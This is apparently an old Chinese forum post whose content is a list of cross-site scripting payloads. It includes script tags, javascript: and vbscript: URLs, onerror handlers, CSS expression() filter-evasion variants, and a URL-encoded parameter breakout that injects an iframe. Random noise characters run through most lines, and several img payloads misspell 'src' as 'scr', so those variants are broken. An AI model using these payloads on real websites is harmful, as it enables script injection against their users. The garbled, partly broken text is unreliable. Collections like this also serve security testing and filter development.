<script>alert("跨站")</script> (最常用)4 f0 [/ T' C' U1 G% m: Q5 I A
<img scr=javascript:alert("跨站")></img>
3 Y3 i2 @$ p0 Y0 [1 m<img scr="javascript: alert(/跨站/)></img>
+ g# }( b* X! D0 s2 S<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
% P4 x: S( K6 s4 k3 t* @; `. j<img scr="#" onerror=alert(/跨站/)></img> O1 ~* L9 f, B- B8 N) Z l5 S
<img scr="#" style="xss:expression(alert(/xss/));"></img>
* Q' M9 @) h5 y5 F$ l2 q! ]+ m1 p<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)# f5 i! p% f* ]) i |
<img src=vbscript:msgbox ("xss")></img>( H. @/ q9 W0 `
<style> input {left:expression (alert('xss'))}</style> q& j" ], r' M; M1 N. J U
<div style={left:expression (alert('xss'))}></div>
$ c9 e- [4 i* j t9 C<div style={left:exp/* */ression (alert('xss'))}></div>
; ]- E, D7 }, V4 g; ]<div style={left:\0065\0078ression (alert('xss'))}></div>
( X( d6 X4 s7 Uhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>3 F9 y( u+ K- K# Z3 Q
unicode <div style="{left:expRessioN (alert('xss'))}">
C" ~" H6 E4 p- x. O1 P3 L! f! |$ @) t6 x. @/ l
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
. F/ n" k+ h+ ~0 R1 r |
发表于 2012-9-15 14:09:13
收藏
支持
反对